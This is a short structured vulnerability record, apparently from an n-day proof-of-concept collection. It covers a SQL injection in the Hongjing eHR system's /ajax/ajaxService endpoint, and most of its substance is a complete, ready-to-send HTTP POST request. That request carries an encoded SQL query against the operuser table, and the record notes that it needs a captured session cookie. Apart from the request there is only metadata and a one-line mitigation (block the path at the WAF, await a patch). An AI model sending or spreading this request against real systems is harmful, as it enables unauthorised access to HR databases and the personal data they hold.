vendor = "宏景"
name = "宏景eHR系统ajaxService接口处存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/ajax/ajaxService"
detail = "POST /ajax/ajaxService HTTP/1.1 Host: Cookie: 抓到的cookie Content-Type: application/x-www-form-urlencoded __type=extTrans&__xml={\"functionId\":\"151211001137\",\"sql\":\"select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser\",\"nbase\":\"1\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0808"
label = "nday"
